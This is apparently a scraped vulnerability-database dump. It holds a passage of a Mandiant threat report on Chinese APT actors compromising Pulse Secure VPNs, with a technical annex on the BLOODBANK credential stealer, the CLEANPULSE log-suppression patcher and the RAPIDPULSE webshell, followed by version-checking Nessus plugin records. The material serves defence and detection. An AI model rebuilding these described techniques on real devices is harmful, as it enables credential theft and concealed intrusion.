U.S. and Europe. While the U.S. remained the single most frequently targeted country, it became a much smaller percentage of observed activity. From 2012\u20132015, U.S. targeting constituted nearly 70 percent of all observed Chinese cyber espionage, while from January 2016 through August 2019, U.S. targeting fell to approximately 20 percent of Chinese activity. Targeting of Europe represented a similar proportion of overall Chinese activity to targeting of the Americas.\n\n_Changes in Chinese Espionage Activity between 2019 and 2021_\n\nBased on developments observed between 2019-2021, Mandiant Threat Intelligence assesses that most Chinese APT actors now concentrate on lower-volume but more-sophisticated, stealthier operations collecting strategic intelligence to support Chinese strategic political, military, and economic goals. While some of the technical changes may be the result of the restructuring of China's military and civilian organizations, some changes possibly reflect larger technical trends in cyber operations overall.\n\n * Before the reorganization, it was common to observe multiple Chinese espionage groups targeting the same organization, often targeting the same types of information. Post-2015, this duplication of efforts is rare.\n * Chinese espionage groups developed more efficient and purposeful targeting patterns by transitioning away from spearphishing and relying on end user software vulnerabilities and instead began exploiting networking devices and web facing applications in novel ways. Chinese APT actors also began to leverage supply chain vulnerabilities and to target third party providers to gain access to primary targets.\n * Recently observed Chinese cyber espionage activity exhibits an increased diligence in operational security, familiarity with network defender investigation techniques, and cognizance of the forensic evidence they leave behind.\n * We observe the resurgence of older Chinese espionage groups, including APT4 and APT5 after long periods of dormancy and currently active groups engage in frequent and widespread campaigns.\n\n_Redline Withdrawn?_\n\nThe Obama-Xi agreement prohibits the theft of intellectual property with purely commercial applications for the purpose of gaining a competitive advantage. It does not cover government or diplomatic information, sensitive business communications, IT data, PII, or intellectual property with military or dual use applications.\n\n * We have direct evidence of UNC2630, UNC2717 and other Chinese APT actors stealing credentials, email communications, and intellectual property with dual commercial and military applications.\n * Throughout our investigations, we did not directly observe the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.\n\nGiven the narrow definition of commercial intellectual property theft and the limited availability of forensic evidence, it is possible that our assessment will change with the discovery of new information.\n\nEvidence collected by Mandiant over the past decade suggests that norms and diplomatic agreements do not significantly limit China's use of its cyber threat capabilities, particularly when serving high-priority missions.\n\nThe greater ambition and risk tolerance demonstrated by Chinese policymakers since 2019 indicates that the tempo of Chinese state-sponsored activity may increase in the near future and that the Chinese cyber threat apparatus presents a renewed and serious threat to US and European commercial entities.\n\n#### Acknowledgements\n\nMandiant would like to thank analysts at BAE Systems Applied Intelligence, Stroz Friedberg, and Pulse Secure for their hard work, collaboration and partnership. The team would also like to thank Scott Henderson, Kelli Vanderlee, Jacqueline O'Leary, Michelle Cantos, and all the analysts who worked on Mandiant\u2019s _Red Line Redrawn_ project. The team would also like to thank Mike Dockry, Josh Villanueva, Keith Knapp, and all the incident responders who worked on these engagements.\n\n#### Additional Resources\n\n * [CISA Alert (AA21-110A): Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa-21-110a>)\n * [Pulse Secure Advisory SA44101: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n * [Pulse Secure Advisory SA44784: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>)\n * [Pulse Secure Customer FAQ KB44764: PCS Security Integrity Tool Enhancements](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>)\n * [Pulse Secure KB44755: Pulse Connect Secure (PCS) Integrity Assurance](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>)\n\n#### Detecting the Techniques\n\nThe following table contains specific FireEye product detection names for the malware families associated with this updated information.\n\n**Platform(s)**\n\n| \n\n**Detection Name** \n \n---|--- \n \nNetwork Security\n\nEmail Security\n\nDetection On Demand\n\nMalware File Scanning\n\nMalware File Storage Scanning\n\n| \n\n * FE_APT_Tool_Linux32_BLOODMINE_1\n * FE_APT_Tool_Linux_BLOODMINE_1\n * FE_APT_Tool_Linux32_BLOODBANK_1\n * FE_APT_Tool_Linux_BLOODBANK_1\n * FE_APT_Tool_Linux32_CLEANPULSE_1\n * FE_APT_Tool_Linux_CLEANPULSE_1\n * FE_APT_Webshell_PL_RAPIDPULSE_1\n * FEC_APT_Webshell_PL_RAPIDPULSE_1 \n \nEndpoint Security\n\n| \n\n**Real-Time Detection (IOC)**\n\n * BLOODBANK (UTILITY)\n * BLOODMINE (UTILITY) \n \nHelix\n\n| \n\n**Establish Foothold**\n\n * WINDOWS METHODOLOGY [User Account Created]\n * WINDOWS METHODOLOGY [User Created - Net Command]\n\n**Escalate Privileges**\n\n * WINDOWS METHODOLOGY [Mimikatz Args]\n * WINDOWS METHODOLOGY [Invoke-Mimikatz Powershell Artifacts]\n * WINDOWS METHODOLOGY [LSASS Memory Access]\n * WINDOWS METHODOLOGY [LSASS Generic Dump Activity]\n\n**Internal Reconnaissance**\n\n * WINDOWS ANALYTICS [Recon Commands]\n\n**Move Laterally**\n\n * WINDOWS ANALYTICS [Abnormal RDP Logon]\n * OFFICE 365 ANALYTICS [Abnormal Logon] \n \n#### Technical Annex\n\n_BLOODMINE_\n\nBLOODMINE is a utility for parsing Pulse Secure Connect log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file.\n\nThe sample takes three command line arguments\n\n 1. Filename to read\n 2. Filename to write\n 3. Timeout interval\n\nIt parses the input file for login status codes:\n\nAUT31504 \n \n--- \n \nAUT24414 \n \nAUT22673 \n \nAUT22886 \n \nAUT23574 \n \nIt parses the input file for web results code WEB20174. If it finds a web result code, it looks for file extensions:\n\n.css \n \n--- \n \n.jpg \n \n.png \n \n.gif \n \n.ico \n \n.js \n \n.jsp \n \nThese strings indicate the type of data that is collected from web requests:\n\nWeb login, IP: %s, User: %s, Realm: %s, Roles: %s, Browser: %s \n \n--- \n \nAgent login, IP: %s, User: %s, Realm: %s, Roles: %s, Client: %s \n \nLogout, IP: %s, User: %s, Realm: %s, Roles: %s \n \nSession end, IP: %s, User: %s, Realm: %s, Roles: %s \n \nNew session, IP: %s, User: %s, Realm: %s, Roles: %s, New IP: %s \n \nHost check, Policy: %s \n \nWebRequest completed, IP: %s, User: %s, Realm: %s, Roles: %s, %s to %s://%s:%s/%s from %s \n \n_BLOODBANK_\n\nBLOODBANK is a credential theft utility that parses two LMDB (an in memory database) files and expects an output file to be given at the command prompt. BLOODBANK takes advantage of a legitimate process that supports Single Sign On functionality and looks for plaintext passwords when they are briefly loaded in memory.\n\nThe utility parses the following two files containing password hashes or plaintext passwords:\n\n * /home/runtime/mtmp/lmdb/data0/data.mdb\n * /home/runtime/mtmp/system\n\nBLOODBANK expects an output file as a command line parameter, otherwise it prints file open error. It contains the following strings which it likely tries to extract and target.\n\nPRIMARY \n \n--- \n \nSECONDARY \n \nremoteaddr \n \nuser@ \n \nlogicUR \n \nlogicTim \n \npassw@ \n \nuserAge \n \nrealm \n \nSourc \n \n_CLEANPULSE_\n\nCLEANPULSE is a memory patching utility that may be used to prevent certain log events from occurring. The utility inserts two strings from the command line into the target process and patches code to conditionally circumvent a function call in the original executable.\n\nFile Name\n\n| \n\nFile Type\n\n| \n\nSize\n\n| \n\nCompile Time \n \n---|---|---|--- \n \ndsrlog\n\n| \n\nELF.X86\n\n| \n\n13332\n\n| \n \nThe utility expects to be run from the command line as follows:\n\ndrslog <pid> <code2_string> <code3_string> <command>\n\nWhere <pid> is the pid process ID to patch in memory, <code2_string> and <code3_string> are two strings to write into the target process, and <command> is either 'e' or 'E' for installation or 'u' or 'U' for uninstallation.\n\nDuring installation (using the 'e' or 'E' <command>), the <code2_string> <code3_string> command line strings are written to the target process at hard-coded memory addresses, a small amount of code is written, and a jump instruction to the code snippet is patched in memory of the target process. The added code checks whether an argument is equal to either <code2_string> <code3_string> strings, and if, so skips a function call in the target process.\n\nDuring uninstall (using the 'u' or 'U' <command>) the patch jump location is overwritten with what appears to be the original 8 bytes of instructions, and the two additional memory buffers and the code snippet appear to be overwritten with zeros.\n\nThe CLEANPULSE utility is highly specific to a victim environment. It does not contain any validation code when patching (i.e. verifying that code is expected prior to modifying it), and it contains hard-coded addresses to patch.\n\nThe target code to patch appears to be the byte sequence: 89 4C 24 08 FF 52 04. This appears as the last bytes in the patched code, and is the 8-bytes written when the uninstall 'u' command is given.\n\nThese bytes correspond to the following two instructions:\n\n.data:0804B138 89 4C 24 08 mov [esp+8], ecx \n \n--- \n \n.data:0804B13C FF 52 04 call dword ptr [edx+4] \n \nThis byte sequence occurs at the hard-coded patch address the utility expects, dslogserver. Based on status and error messages in nearby functions the executable dslogserver appears to be related to log event handling, and the purpose of the CLEANPULSE utility may be to prevent certain events from being logged.\n\nThere are several un-referenced functions that appear to have been taken from the open source project PUPYRAT. It is likely that the actor re-purposed this open source code, using PUPYRAT as a simple template project.\n\n_RAPIDPULSE_\n\nRAPIDPULSE is a webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file.\n\nThe webshell modifies the legitimate file's main routine which compares the HTTP query parameter with key name: deviceid to a specific key with value. If the parameter matches, then the sample uses an RC4 key to decrypt HTTP query parameter with key name: hmacTime. This decrypted value is a filename which the sample then opens, reads, RC4 encrypts with the same key, base64 encodes, then writes to stdout. The appliance redirects stdout as the response to HTTP requests. This serves as an encrypted file download for the attacker.\n\n#### Integrity Checker Tool and Other Validation Checks\n\nIn our public report, we noted two code families that manipulate check_integrity.sh, a legitimate script used during a normal system upgrade. This validation script was modified by the actor to exit early so that it would not perform the intended checks.\n\nPer Ivanti, the validation provided by check_integrity.sh is a separate validation feature and not the same as the [Integrity Checker Tool (ICT)](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) available on their website. They recommend that organizations use the online ICT to confirm that hashes of files on their Pulse Secure devices match Ivanti\u2019s list of known good hashes. Please note that the ICT does not scan the rollback partition.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-05-27T00:00:00", "type": "fireeye", "title": "Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-27T00:00:00", "id": "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "href": "https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:58:37", "description": "The version of the remote Accellion Secure File Transfer Appliance is prior to 9_12_416. It is, therefore, affected by multiple vulnerabilities:\n\n - SQL injection via a crafted Host header in a request to an endpoint. (CVE-2021-27101)\n\n - OS command execution via a local web service call. (CVE-2021-27102)\n\n - SSRF via a crafted POST request to an endpoint. (CVE-2021-27103)\n\n - OS command execution via a crafted POST request to various admin endpoints. (CVE-2021-27104)\n\nAlso, Accellion File Transfer Appliance is no longer supported by the vendor.\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain other security vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-05T00:00:00", "type": "nessus", "title": "Accellion File Transfer Appliance < 9_12_416 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/h:accellion:secure_file_transfer_appliance"], "id": "ACCELLION_FTA_9_12_380.NASL", "href": "https://www.tenable.com/plugins/nessus/154933", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154933);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-27101\",\n \"CVE-2021-27102\",\n \"CVE-2021-27103\",\n \"CVE-2021-27104\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0011\");\n\n script_name(english:\"Accellion File Transfer Appliance < 9_12_416 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the remote Accellion Secure File Transfer Appliance is prior to 9_12_416. It is, therefore, \naffected by multiple vulnerabilities:\n\n - SQL injection via a crafted Host header in a request to an endpoint. (CVE-2021-27101)\n\n - OS command execution via a local web service call. (CVE-2021-27102)\n\n - SSRF via a crafted POST request to an endpoint. (CVE-2021-27103)\n\n - OS command execution via a crafted POST request to various admin endpoints. (CVE-2021-27104)\n\nAlso, Accellion File Transfer Appliance is no longer supported by the vendor.\nLack of support implies that no new security patches for the product will be released by the vendor. \nAs a result, it is likely to contain other security vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/accellion/CVEs\");\n # https://www.accellion.com/sites/default/files/resources/fta-eol.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6f8410d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to version 9_12_416 or later, or \n upgrade to a more secure platform, kiteworks that is currently supported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:accellion:secure_file_transfer_appliance\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"accellion_file_transfer_appliance_unsupported.nasl\");\n script_require_keys(\"installed_sw/Accellion Secure File Transfer Appliance\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp_name = 'Accellion Secure File Transfer Appliance';\n\nif (!get_install_count(app_name:app_name))\n audit(AUDIT_NOT_DETECT, app_name);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:443);\n\nreport = 'The remote host is running Accellion File Transfer Appliance (FTA) that is End of Life (EOL) on Apr 30th 2021.\\n' +\n 'It is recommended by Accellion that all customers upgrade to a more secure platform, kiteworks that is currently supported.\\n\\n' + \n 'Otherwise, update to Accellion FTA version 9_12_416 or later.';\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:46:39", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than 9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Pulse Connect Secure < 9.1R11.4 (SA44784)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA44784.NASL", "href": "https://www.tenable.com/plugins/nessus/148847", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148847);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-22893\",\n \"CVE-2021-22894\",\n \"CVE-2021-22899\",\n \"CVE-2021-22900\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0207-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0024\");\n\n script_name(english:\"Pulse Connect Secure < 9.1R11.4 (SA44784)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is greater than\n9.0R3 and prior to 9.1R11.4. It is, therefore, affected by multiple vulnerabilities including an authentication bypass\nvulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect\nSecure gateway.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Pulse Connect Secure version 9.1R11.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22894\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22893\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulsesecure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/\n# 9.1R11.3 is 9.1.11.12173\n# 9.1R11.4 is 9.1.11.12319\nconstraints = [\n {'min_version':'9.0.3', 'max_version':'9.1.11.12173', 'fixed_display':'9.1R11.4 (9.1.11.12319)'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-02-07T14:59:28", "description": "This plugin detects the potential presence of a web shell in selected directories and this can be indicative that the host might have been targeted in the Hafnium campaign. It is recommended that the results are manually verified and appropriate remediation actions taken.\n\nNote that Nessus has not tested for this issue but has instead looked for .aspx files that could potentially indicate compromise.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-08T00:00:00", "type": "nessus", "title": "Potential exposure to Hafnium Microsoft Exchange targeting", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "HAFNIUM_IOC_DETECT.NBIN", "href": "https://www.tenable.com/plugins/nessus/147193", "sourceData": "Binary data hafnium_ioc_detect.nbin", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T14:46:27", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (March 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2023-01-31T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "href": "https://www.tenable.com/plugins/nessus/147003", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147003);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/31\");\n\n script_cve_id(\n \"CVE-2021-26412\",\n \"CVE-2021-26854\",\n \"CVE-2021-26855\",\n \"CVE-2021-26857\",\n \"CVE-2021-26858\",\n \"CVE-2021-27065\",\n \"CVE-2021-27078\"\n );\n script_xref(name:\"MSKB\", value:\"5000871\");\n script_xref(name:\"MSFT\", value:\"MS21-5000871\");\n script_xref(name:\"IAVA\", value:\"2021-A-0111-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/16\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0014\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0018\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0013\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-26412, CVE-2021-26854,\n CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065,\n CVE-2021-27078)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14b26c05\");\n # https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fedb98e4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5000871\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26855\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 